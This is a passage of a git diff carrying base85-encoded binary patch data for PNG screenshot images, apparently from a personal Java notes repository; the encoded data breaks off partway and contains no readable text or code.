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 
diff --git "a/java\346\227\245\345\270\270/img/image-20221220233047039.png" "b/java\346\227\245\345\270\270/img/image-20221220233047039.png" new file mode 100644 index 0000000000000000000000000000000000000000..9b6fda51251c1640b436117c124f60a529ac42ca GIT binary patch literal 130319
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 
